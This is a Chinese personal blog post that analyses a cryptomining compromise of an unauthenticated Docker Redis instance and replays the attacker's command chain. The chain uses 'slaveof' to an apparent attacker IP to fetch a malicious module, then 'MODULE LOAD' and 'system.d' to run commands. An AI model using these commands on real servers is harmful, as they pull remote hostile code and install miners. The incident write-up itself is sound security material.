avatar

Catalog
docker Redis 被挖矿场景复现

docker redis被任意链接 导致被kdevtmpfsi挖矿记录

昨天发现服务器被挖矿了,我ssh可是都没开的,他是怎么用我容器挖矿的?

带这个问题,我把redis容器再次弄成随意链接,想钓出他执行的命令。

开始追踪前准备

Code
1
2
3
config set slowlog-log-slower-than 0   //所有命令都会被定义成慢查询 
config set slowlog-max-len 10000 //保留1w条记录
config set slowlog-max-len 1000000 //他会不会执行很多命令? 改成保留100w保险些

上钩了

大概3-4小时,就把我容器做矿机了,真快。

是不是有检测系统,发现我掉了…

这是redis执行过的所有命令(有部分是我的):
http://cdn.lblog.club/files/redis_log.txt

Code
1
2
3
4
5
6
7
8
slowlog格式说明
7 slowlog的id
1585115869 执行的时间戳
15 执行命令的消耗时间 微秒
set //命令
1 //命令
test //命令 组合就是set 1 test
127.0.0.1:55968 //客户端 端口

我得到了他的执行过命令,然后我重新编译容器,准备复现他的操作。

开始复现

Code
1
2
3
4
5
6
7
8
9
10
11
12
127.0.0.1:6379> slaveof 82.118.17.133 8887    
OK
//此时把他redis数据 同步到受害机 dump.rdb已经是有毒的模块了!
//可惜dump.rdb用rdb看不了,不知道是什么操作,不知道这个dump.rdb的内容

127.0.0.1:6379> MODULE LOAD ./dump.rdb //加载模块
OK

127.0.0.1:6379> system.d id
""
(1184.54s)
//获得成就:主动当矿机 成就加成:cpu+90% 内存+10% (使用量)

你在你的redis执行这三条命令, 就可以复现被成为矿机的场景。主动当矿机了

Author: xxh
Link: http://lblog.club/2020/03/25/docker_redis_kdevtmpfsi_/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.

Comment